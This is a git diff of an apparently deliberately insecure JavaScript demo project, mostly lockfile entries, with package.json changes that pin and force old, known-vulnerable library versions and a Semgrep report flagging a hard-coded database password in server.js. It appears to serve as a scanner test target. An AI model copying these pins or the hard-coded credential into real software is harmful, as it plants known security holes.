"sha512-/bjOqmgETBYB5BoEeGVea8dmvHb2m9GLy1E9W43yeyfP6QQCZGFNa+XRceJEuDB6zqr+gKpIAmlLebMpykw/MQ==", + "optional": true, + "dependencies": { + "aggregate-error": "^3.0.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/path-is-absolute": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", + "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==", + "optional": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/path-parse": { + "version": "1.0.7", + "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", + "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==" + }, + "node_modules/prebuild-install": { + "version": "7.1.2", + "resolved": "https://registry.npmjs.org/prebuild-install/-/prebuild-install-7.1.2.tgz", + "integrity": "sha512-UnNke3IQb6sgarcZIDU3gbMeTp/9SSU1DAIkil7PrqG1vZlBtY5msYccSKSHDqa3hNg436IXK+SNImReuA1wEQ==", + "dependencies": { + "detect-libc": "^2.0.0", + "expand-template": "^2.0.3", + "github-from-package": "0.0.0", + "minimist": "^1.2.3", + "mkdirp-classic": "^0.5.3", + "napi-build-utils": "^1.0.1", + "node-abi": "^3.3.0", + "pump": "^3.0.0", + "rc": "^1.2.7", + "simple-get": "^4.0.0", + "tar-fs": "^2.0.0", + "tunnel-agent": "^0.6.0" + }, + "bin": { + "prebuild-install": "bin.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/promise-inflight": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/promise-inflight/-/promise-inflight-1.0.1.tgz", + "integrity": "sha512-6zWPyEOFaQBJYcGMHBKTKJ3u6TBsnMFOIZSa6ce1e/ZrrsOlnHRHbabMjLiBYKp+n44X9eUI6VUPaukCXHuG4g==", + "optional": true + }, + "node_modules/promise-retry": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/promise-retry/-/promise-retry-2.0.1.tgz", + "integrity": "sha512-y+WKFlBR8BGXnsNlIHFGPZmyDf3DFMoLhaflAnyZgV6rG6xu+JwesTo2Q9R6XwYmtmwAFCkAk3e35jEdoeh/3g==", + "optional": true, + "dependencies": { + "err-code": "^2.0.2", + "retry": "^0.12.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/pump": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/pump/-/pump-3.0.2.tgz", + "integrity": "sha512-tUPXtzlGM8FE3P0ZL6DVs/3P58k9nk8/jZeQCurTJylQA8qFYzHFfhBJkuqyE0FifOsQ0uKWekiZ5g8wtr28cw==", + "dependencies": { + "end-of-stream": "^1.1.0", + "once": "^1.3.1" + } + }, + "node_modules/rc": { + "version": "1.2.8", + "resolved": "https://registry.npmjs.org/rc/-/rc-1.2.8.tgz", + "integrity": "sha512-y3bGgqKj3QBdxLbLkomlohkvsA8gdAiUQlSBJnBhfn+BPxg4bc62d8TcBW15wavDfgexCgccckhcZvywyQYPOw==", + "dependencies": { + "deep-extend": "^0.6.0", + "ini": "~1.3.0", + "minimist": "^1.2.0", + "strip-json-comments": "~2.0.1" + }, + "bin": { + "rc": "cli.js" + } + }, + "node_modules/readable-stream": { + "version": "3.6.2", + "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-3.6.2.tgz", + "integrity": "sha512-9u/sniCrY3D5WdsERHzHE4G2YCXqoG5FTHUiCC4SIbr6XcLZBY05ya9EKjYek9O5xOAwjGq+1JdGBAS7Q9ScoA==", + "dependencies": { + "inherits": "^2.0.3", + "string_decoder": "^1.1.1", + "util-deprecate": "^1.0.1" + }, + "engines": { + "node": ">= 6" + } + }, + "node_modules/resolve": { + "version": "1.22.8", + "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.8.tgz", + "integrity": "sha512-oKWePCxqpd6FlLvGV1VU0x7bkPmmCNolxzjMf4NczoDnQcIWrAF+cPtZn5i6n+RfD2d9i0tzpKnG6Yk168yIyw==", + "dependencies": { + "is-core-module": "^2.13.0", + "path-parse": "^1.0.7", + "supports-preserve-symlinks-flag": "^1.0.0" + }, + "bin": { + "resolve": "bin/resolve" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/retry": { + "version": "0.12.0", + "resolved": "https://registry.npmjs.org/retry/-/retry-0.12.0.tgz", + "integrity": "sha512-9LkiTwjUh6rT555DtE9rTX+BKByPfrMzEAtnlEtdEwr3Nkffwiihqe2bWADg+OQRjt9gl6ICdmB/ZFDCGAtSow==", + "optional": true, + "engines": { + "node": ">= 4" + } + }, + "node_modules/retry-as-promised": { + "version": "2.3.2", + "resolved": "https://registry.npmjs.org/retry-as-promised/-/retry-as-promised-2.3.2.tgz", + "integrity": "sha512-KZMPON7wEhqU4pyWzXw/Ti8NYTVk5+qQ5OfAq3+L/3gJ2Fv+YaLVHbFSK80XlIfI9WrdP8c73bDTrh14SvTSKw==", + "dependencies": { + "bluebird": "^3.4.6", + "debug": "^2.6.9" + } + }, + "node_modules/retry-as-promised/node_modules/debug": { + "version": "2.6.9", + "resolved": "https://registry.npmjs.org/debug/-/debug-2.6.9.tgz", + "integrity": "sha512-bC7ElrdJaJnPbAP+1EotYvqZsb3ecl5wi6Bfi6BJTUcNowp6cvspg0jXznRTKDjm/E7AdgFBVeAPVMNcKGsHMA==", + "dependencies": { + "ms": "2.0.0" + } + }, + "node_modules/retry-as-promised/node_modules/ms": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.0.0.tgz", + "integrity": "sha512-Tpp60P6IUJDTuOq/5Z8cdskzJujfwqfOTkrwIwj7IRISpnkJnT6SyJ4PCPnGMoFjC9ddhal5KVIYtAt97ix05A==" + }, + "node_modules/rimraf": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-3.0.2.tgz", + "integrity": "sha512-JZkJMZkAGFFPP2YqXZXPbMlMBgsxzE8ILs4lMIX/2o0L9UBw9O/Y3o6wFw/i9YLapcUJWwqbi3kdxIPdC62TIA==", + "deprecated": "Rimraf versions prior to v4 are no longer supported", + "optional": true, + "dependencies": { + "glob": "^7.1.3" + }, + "bin": { + "rimraf": "bin.js" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, + "node_modules/safe-buffer": { + "version": "5.2.1", + "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.2.1.tgz", + "integrity": "sha512-rp3So07KcdmmKbGvgaNxQSJr7bGVSVk5S9Eq1F+ppbRo70+YeaDxkw5Dd8NPN+GD6bjnYm2VuPuCXmpuYvmCXQ==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ] + }, + "node_modules/safer-buffer": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", + "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" + }, + "node_modules/semver": { + "version": "5.4.1", + "resolved": "https://registry.npmjs.org/semver/-/semver-5.4.1.tgz", + "integrity": "sha512-WfG/X9+oATh81XtllIo/I8gOiY9EXRdv1cQdyykeXK17YcUW3EXUAi2To4pcH6nZtJPr7ZOpM5OMyWJZm+8Rsg==", + "bin": { + "semver": "bin/semver" + } + }, + "node_modules/seq-queue": { + "version": "0.0.5", + "resolved": "https://registry.npmjs.org/seq-queue/-/seq-queue-0.0.5.tgz", + "integrity": "sha512-hr3Wtp/GZIc/6DAGPDcV4/9WoZhjrkXsi5B/07QgX8tsdc6ilr7BFM6PM6rbdAX1kFSDYeZGLipIZZKyQP0O5Q==" + }, + "node_modules/sequelize": { + "version": "4.44.1", + "resolved": "https://registry.npmjs.org/sequelize/-/sequelize-4.44.1.tgz", + "integrity": "sha512-eMPkuIRFMVSJWL4QXkI3luuOC/fxSQ0KRHodQb/cbB0PZSbJZ5pNv9HoQkAyzGKdxnU1efb4vMy9ctFcRhIVOw==", + "deprecated": "Please update to v6 or higher! A migration guide can be found here: https://sequelize.org/v6/manual/upgrade-to-v6.html", + "dependencies": { + "bluebird": "^3.5.0", + "cls-bluebird": "^2.1.0", + "debug": "^3.1.0", + "depd": "^1.1.0", + "dottie": "^2.0.0", + "generic-pool": "3.5.0", + "inflection": "1.12.0", + "lodash": "^4.17.1", + "moment": "^2.20.0", + "moment-timezone": "^0.5.14", + "retry-as-promised": "^2.3.2", + "semver": "^5.5.0", + "terraformer-wkt-parser": "^1.1.2", + "toposort-class": "^1.0.1", + "uuid": "^3.2.1", + "validator": "^10.4.0", + "wkx": "^0.4.1" + }, + "engines": { + "node": ">=4.0.0" + } + }, + "node_modules/set-blocking": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/set-blocking/-/set-blocking-2.0.0.tgz", + "integrity": "sha512-KiKBS8AnWGEyLzofFfmvKwpdPzqiy16LvQfK3yv/fVH7Bj13/wl3JSR1J+rfgRE9q7xUJK4qvgS8raSOeLUehw==", + "optional": true + }, + "node_modules/shimmer": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/shimmer/-/shimmer-1.2.1.tgz", + "integrity": "sha512-sQTKC1Re/rM6XyFM6fIAGHRPVGvyXfgzIDvzoq608vM+jeyVD0Tu1E6Np0Kc2zAIFWIj963V2800iF/9LPieQw==" + }, + "node_modules/signal-exit": { + "version": "3.0.7", + "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-3.0.7.tgz", + "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==", + "optional": true + }, + "node_modules/simple-concat": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/simple-concat/-/simple-concat-1.0.1.tgz", + "integrity": "sha512-cSFtAPtRhljv69IK0hTVZQ+OfE9nePi/rtJmw5UjHeVyVroEqJXP1sFztKUy1qU+xvz3u/sfYJLa947b7nAN2Q==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ] + }, + "node_modules/simple-get": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/simple-get/-/simple-get-4.0.1.tgz", + "integrity": "sha512-brv7p5WgH0jmQJr1ZDDfKDOSeWWg+OVypG99A/5vYGPqJ6pxiaHLy8nxtFjBA7oMa01ebA9gfh1uMCFqOuXxvA==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ], + "dependencies": { + "decompress-response": "^6.0.0", + "once": "^1.3.1", + "simple-concat": "^1.0.0" + } + }, + "node_modules/smart-buffer": { + "version": "4.2.0", + "resolved": "https://registry.npmjs.org/smart-buffer/-/smart-buffer-4.2.0.tgz", + "integrity": "sha512-94hK0Hh8rPqQl2xXc3HsaBoOXKV20MToPkcXvwbISWLEs+64sBq5kFgn2kJDHb1Pry9yrP0dxrCI9RRci7RXKg==", + "optional": true, + "engines": { + "node": ">= 6.0.0", + "npm": ">= 3.0.0" + } + }, + "node_modules/socks": { + "version": "2.8.3", + "resolved": "https://registry.npmjs.org/socks/-/socks-2.8.3.tgz", + "integrity": "sha512-l5x7VUUWbjVFbafGLxPWkYsHIhEvmF85tbIeFZWc8ZPtoMyybuEhL7Jye/ooC4/d48FgOjSJXgsF/AJPYCW8Zw==", + "optional": true, + "dependencies": { + "ip-address": "^9.0.5", + "smart-buffer": "^4.2.0" + }, + "engines": { + "node": ">= 10.0.0", + "npm": ">= 3.0.0" + } + }, + "node_modules/socks-proxy-agent": { + "version": "6.2.1", + "resolved": "https://registry.npmjs.org/socks-proxy-agent/-/socks-proxy-agent-6.2.1.tgz", + "integrity": "sha512-a6KW9G+6B3nWZ1yB8G7pJwL3ggLy1uTzKAgCb7ttblwqdz9fMGJUuTy3uFzEP48FAs9FLILlmzDlE2JJhVQaXQ==", + "optional": true, + "dependencies": { + "agent-base": "^6.0.2", + "debug": "^4.3.3", + "socks": "^2.6.2" + }, + "engines": { + "node": ">= 10" + } + }, + "node_modules/socks-proxy-agent/node_modules/debug": { + "version": "4.3.7", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.7.tgz", + "integrity": "sha512-Er2nc/H7RrMXZBFCEim6TCmMk02Z8vLC2Rbi1KEBggpo0fS6l0S1nnapwmIi3yW/+GOJap1Krg4w0Hg80oCqgQ==", + "optional": true, + "dependencies": { + "ms": "^2.1.3" + }, + "engines": { + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } + } + }, + "node_modules/source-map": { + "version": "0.5.7", + "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.5.7.tgz", + "integrity": "sha512-LbrmJOMUSdEVxIKvdcJzQC+nQhe8FUZQTXQy6+I75skNgn3OoQ0DZA8YnFa7gp8tqtL3KPf1kmo0R5DoApeSGQ==", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/sprintf-js": { + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.1.3.tgz", + "integrity": "sha512-Oo+0REFV59/rz3gfJNKQiBlwfHaSESl1pcGyABQsnnIfWOFt6JNj5gCog2U6MLZ//IGYD+nA8nI+mTShREReaA==", + "optional": true + }, + "node_modules/sqlite3": { + "version": "5.1.7", + "resolved": "https://registry.npmjs.org/sqlite3/-/sqlite3-5.1.7.tgz", + "integrity": "sha512-GGIyOiFaG+TUra3JIfkI/zGP8yZYLPQ0pl1bH+ODjiX57sPhrLU5sQJn1y9bDKZUFYkX1crlrPfSYt0BKKdkog==", + "hasInstallScript": true, + "dependencies": { + "bindings": "^1.5.0", + "node-addon-api": "^7.0.0", + "prebuild-install": "^7.1.1", + "tar": "^6.1.11" + }, + "optionalDependencies": { + "node-gyp": "8.x" + }, + "peerDependencies": { + "node-gyp": "8.x" + }, + "peerDependenciesMeta": { + "node-gyp": { + "optional": true + } + } + }, + "node_modules/sqlstring": { + "version": "2.3.3", + "resolved": "https://registry.npmjs.org/sqlstring/-/sqlstring-2.3.3.tgz", + "integrity": "sha512-qC9iz2FlN7DQl3+wjwn3802RTyjCx7sDvfQEXchwa6CWOx07/WVfh91gBmQ9fahw8snwGEWU3xGzOt4tFyHLxg==", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/ssri": { + "version": "8.0.1", + "resolved": "https://registry.npmjs.org/ssri/-/ssri-8.0.1.tgz", + "integrity": "sha512-97qShzy1AiyxvPNIkLWoGua7xoQzzPjQ0HAH4B0rWKo7SZ6USuPcrUiAFrws0UH8RrbWmgq3LMTObhPIHbbBeQ==", + "optional": true, + "dependencies": { + "minipass": "^3.1.1" + }, + "engines": { + "node": ">= 8" + } + }, + "node_modules/string_decoder": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.3.0.tgz", + "integrity": "sha512-hkRX8U1WjJFd8LsDJ2yQ/wWWxaopEsABU1XfkM8A+j0+85JAGppt16cr1Whg6KIbb4okU6Mql6BOj+uup/wKeA==", + "dependencies": { + "safe-buffer": "~5.2.0" + } + }, + "node_modules/string-width": { + "version": "4.2.3", + "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", + "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", + "optional": true, + "dependencies": { + "emoji-regex": "^8.0.0", + "is-fullwidth-code-point": "^3.0.0", + "strip-ansi": "^6.0.1" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/strip-ansi": { + "version": "6.0.1", + "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", + "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", + "optional": true, + "dependencies": { + "ansi-regex": "^5.0.1" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/strip-json-comments": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/strip-json-comments/-/strip-json-comments-2.0.1.tgz", + "integrity": "sha512-4gB8na07fecVVkOI6Rs4e7T6NOTki5EmL7TUduTs6bu3EdnSycntVJ4re8kgZA+wx9IueI2Y11bfbgwtzuE0KQ==", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/supports-color": { + "version": "5.5.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", + "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", + "dependencies": { + "has-flag": "^3.0.0" }, "engines": { "node": ">=4" @@ -411,7 +1904,6 @@ "version": "1.0.0", "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", - "dev": true, "engines": { "node": ">= 0.4" }, @@ -419,23 +1911,204 @@ "url": "https://github.com/sponsors/ljharb" } }, + "node_modules/tar": { + "version": "6.2.1", + "resolved": "https://registry.npmjs.org/tar/-/tar-6.2.1.tgz", + "integrity": "sha512-DZ4yORTwrbTj/7MZYq2w+/ZFdI6OZ/f9SFHR+71gIVUZhOQPHzVCLpvRnPgyaMpfWxxk/4ONva3GQSyNIKRv6A==", + "dependencies": { + "chownr": "^2.0.0", + "fs-minipass": "^2.0.0", + "minipass": "^5.0.0", + "minizlib": "^2.1.1", + "mkdirp": "^1.0.3", + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/tar-fs": { + "version": "2.1.1", + "resolved": "https://registry.npmjs.org/tar-fs/-/tar-fs-2.1.1.tgz", + "integrity": "sha512-V0r2Y9scmbDRLCNex/+hYzvp/zyYjvFbHPNgVTKfQvVrb6guiE/fxP+XblDNR011utopbkex2nM4dHNV6GDsng==", + "dependencies": { + "chownr": "^1.1.1", + "mkdirp-classic": "^0.5.2", + "pump": "^3.0.0", + "tar-stream": "^2.1.4" + } + }, + "node_modules/tar-fs/node_modules/chownr": { + "version": "1.1.4", + "resolved": "https://registry.npmjs.org/chownr/-/chownr-1.1.4.tgz", + "integrity": "sha512-jJ0bqzaylmJtVnNgzTeSOs8DPavpbYgEr/b0YL8/2GO3xJEhInFmhKMUnEJQjZumK7KXGFhUy89PrsJWlakBVg==" + }, + "node_modules/tar-stream": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/tar-stream/-/tar-stream-2.2.0.tgz", + "integrity": "sha512-ujeqbceABgwMZxEJnk2HDY2DlnUZ+9oEcb1KzTVfYHio0UE6dG71n60d8D2I4qNvleWrrXpmjpt7vZeF1LnMZQ==", + "dependencies": { + "bl": "^4.0.3", + "end-of-stream": "^1.4.1", + "fs-constants": "^1.0.0", + "inherits": "^2.0.3", + "readable-stream": "^3.1.1" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/tar/node_modules/minipass": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/minipass/-/minipass-5.0.0.tgz", + "integrity": "sha512-3FnjYuehv9k6ovOEbyOswadCDPX1piCfhV8ncmYtHOjuPwylVWsghTLo7rabjC3Rx5xD4HDx8Wm1xnMF7S5qFQ==", + "engines": { + "node": ">=8" + } + }, + "node_modules/terraformer": { + "version": "1.0.12", + "resolved": "https://registry.npmjs.org/terraformer/-/terraformer-1.0.12.tgz", + "integrity": "sha512-MokUp0+MFal4CmJDVL6VAO1bKegeXcBM2RnPVfqcFIp2IIv8EbPAjG0j/vEy/vuKB8NVMMSF2vfpVS/QLe4DBg==", + "deprecated": "terraformer is deprecated and no longer supported. Please use @terraformer/arcgis.", + "engines": { + "node": ">=4.2.6" + }, + "optionalDependencies": { + "@types/geojson": "^7946.0.0 || ^1.0.0" + } + }, + "node_modules/terraformer-wkt-parser": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/terraformer-wkt-parser/-/terraformer-wkt-parser-1.2.1.tgz", + "integrity": "sha512-+CJyNLWb3lJ9RsZMTM66BY0MT3yIo4l4l22Jd9CrZuwzk54fsu4Sc7zejuS9fCITTuTQy3p06d4MZMVI7v5wSg==", + "deprecated": "terraformer-wkt-parser is deprecated and no longer supported. Please use @terraformer/wkt.", + "dependencies": { + "@types/geojson": "^1.0.0", + "terraformer": "~1.0.5" + }, + "engines": { + "node": ">=4.2.6" + } + }, "node_modules/to-fast-properties": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/to-fast-properties/-/to-fast-properties-2.0.0.tgz", "integrity": "sha512-/OaKK0xYrs3DmxRYqL/yDc+FxFUVYhDlXMhRmv3z915w2HF1tnN1omB354j8VUGO/hbRzyD6Y3sA7v7GS/ceog==", - "dev": true, "engines": { "node": ">=4" } }, + "node_modules/toposort-class": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/toposort-class/-/toposort-class-1.0.1.tgz", + "integrity": "sha512-OsLcGGbYF3rMjPUf8oKktyvCiUxSbqMMS39m33MAjLTC1DVIH6x3WSt63/M77ihI09+Sdfk1AXvfhCEeUmC7mg==" + }, "node_modules/trim-right": { "version": "1.0.1", "resolved": "https://registry.npmjs.org/trim-right/-/trim-right-1.0.1.tgz", "integrity": "sha512-WZGXGstmCWgeevgTL54hrCuw1dyMQIzWy7ZfqRJfSmJZBwklI15egmQytFP6bPidmw3M8d5yEowl1niq4vmqZw==", - "dev": true, "engines": { "node": ">=0.10.0" } + }, + "node_modules/tunnel-agent": { + "version": "0.6.0", + "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", + "integrity": "sha512-McnNiV1l8RYeY8tBgEpuodCC1mLUdbSN+CYBL7kJsJNInOP8UjDDEwdk6Mw60vdLLrr5NHKZhMAOSrR2NZuQ+w==", + "dependencies": { + "safe-buffer": "^5.0.1" + }, + "engines": { + "node": "*" + } + }, + "node_modules/undici-types": { + "version": "6.19.8", + "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-6.19.8.tgz", + "integrity": "sha512-ve2KP6f/JnbPBFyobGHuerC9g1FYGn/F8n1LWTwNxCEzd6IfqTwUQcNXgEtmmQ6DlRrC1hrSrBnCZPokRrDHjw==" + }, + "node_modules/unique-filename": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/unique-filename/-/unique-filename-1.1.1.tgz", + "integrity": "sha512-Vmp0jIp2ln35UTXuryvjzkjGdRyf9b2lTXuSYUiPmzRcl3FDtYqAwOnTJkAngD9SWhnoJzDbTKwaOrZ+STtxNQ==", + "optional": true, + "dependencies": { + "unique-slug": "^2.0.0" + } + }, + "node_modules/unique-slug": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/unique-slug/-/unique-slug-2.0.2.tgz", + "integrity": "sha512-zoWr9ObaxALD3DOPfjPSqxt4fnZiWblxHIgeWqW8x7UqDzEtHEQLzji2cuJYQFCU6KmoJikOYAZlrTHHebjx2w==", + "optional": true, + "dependencies": { + "imurmurhash": "^0.1.4" + } + }, + "node_modules/util-deprecate": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/util-deprecate/-/util-deprecate-1.0.2.tgz", + "integrity": "sha512-EPD5q1uXyFxJpCrLnCc1nHnq3gOa6DZBocAIiI2TaSCA7VCJ1UJDMagCzIkXNsUYfD1daK//LTEQ8xiIbrHtcw==" + }, + "node_modules/uuid": { + "version": "3.4.0", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", + "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==", + "deprecated": "Please upgrade to version 7 or higher. Older versions may use Math.random() in certain circumstances, which is known to be problematic. See https://v8.dev/blog/math-random for details.", + "bin": { + "uuid": "bin/uuid" + } + }, + "node_modules/validator": { + "version": "10.11.0", + "resolved": "https://registry.npmjs.org/validator/-/validator-10.11.0.tgz", + "integrity": "sha512-X/p3UZerAIsbBfN/IwahhYaBbY68EN/UQBWHtsbXGT5bfrH/p4NQzUCG1kF/rtKaNpnJ7jAu6NGTdSNtyNIXMw==", + "engines": { + "node": ">= 0.10" + } + }, + "node_modules/which": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", + "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", + "optional": true, + "dependencies": { + "isexe": "^2.0.0" + }, + "bin": { + "node-which": "bin/node-which" + }, + "engines": { + "node": ">= 8" + } + }, + "node_modules/wide-align": { + "version": "1.1.5", + "resolved": "https://registry.npmjs.org/wide-align/-/wide-align-1.1.5.tgz", + "integrity": "sha512-eDMORYaPNZ4sQIuuYPDHdQvf4gyCF9rEEV/yPxGfwPkRodwEgiMUUXTx/dex+Me0wxx53S+NgUHaP7y3MGlDmg==", + "optional": true, + "dependencies": { + "string-width": "^1.0.2 || 2 || 3 || 4" + } + }, + "node_modules/wkx": { + "version": "0.4.8", + "resolved": "https://registry.npmjs.org/wkx/-/wkx-0.4.8.tgz", + "integrity": "sha512-ikPXMM9IR/gy/LwiOSqWlSL3X/J5uk9EO2hHNRXS41eTLXaUFEVw9fn/593jW/tE5tedNg8YjT5HkCa4FqQZyQ==", + "dependencies": { + "@types/node": "*" + } + }, + "node_modules/wrappy": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", + "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==" + }, + "node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" } } } diff --git a/insecure-js/package.json b/insecure-js/package.json index a76a7f0..93ae921 100644 --- a/insecure-js/package.json +++ b/insecure-js/package.json @@ -1,13 +1,29 @@ { "dependencies": { + "@aikidosec/firewall": "^1.5.47", + "@babel/core": "7.0.0-rc.1", + "chart.js": "2.8.0", + "chartist": "0.3.0", + "dom-iterator": "^1.0.0", + "jquery": "2.1.0", "lodash": "4.16.1", - "semver": "5.4.1" - }, - "devDependencies": { - "@babel/core": "7.0.0-rc.1" + "mini-html-parser": "^0.0.3", + "mysql2": "^2.3.3", + "semver": "5.4.1", + "sequelize": "4.44.1", + "sqlite3": "^5.0.2" }, "resolutions": { + "lodash": "4.16.1", + "**/lodash": "4.16.1", + "semver": "5.4.1", "**/semver": "5.4.1", - "**/lodash": "4.16.1" + "json5": "2.2.1", + "**/json5": "2.2.1" + }, + "overrides": { + "lodash": "4.16.1", + "semver": "5.4.1", + "json5": "2.2.1" } } diff --git a/insecure-js/semgrep.sarif b/insecure-js/semgrep.sarif new file mode 100644 index 0000000..367cb73 --- /dev/null +++ b/insecure-js/semgrep.sarif @@ -0,0 +1 @@ +{"version":"2.1.0","runs":[{"invocations":[{"executionSuccessful":true,"toolExecutionNotifications":[]}],"results":[{"fingerprints":{"matchBasedId/v1":"8ff3ac9716a48223ef6a17d2f6bb27ce42bbbb90fb423f6961219a5f307138b6a43bfcff4d8afd941bad8fbaadea65c36a120551e08e2ced90ec6019092b5ee7_0"},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"server.js","uriBaseId":"%SRCROOT%"},"region":{"endColumn":2,"endLine":19,"snippet":{"text":"const connection = mysql.createConnection({\n host: 'localhost',\n user: 'root',\n password: 'topsecret',\n database: 'database'\n});"},"startColumn":43,"startLine":14}}}],"message":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"properties":{},"ruleId":"javascript.mysql.node-mysql-hardcoded-secret.node-mysql-hardcoded-secret"},{"fingerprints":{"matchBasedId/v1":"5a3bc5253e78e5f855aefc055d4cf58ced2975b7d47ded57df9f38e7c604444c62b734cff4c983dfd330703b3ec1fd905d4697decdfe4dcf2544255b189e2dbd_0"},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"server.js","uriBaseId":"%SRCROOT%"},"region":{"endColumn":20,"endLine":32,"snippet":{"text":"const server = http.createServer((req, res) => 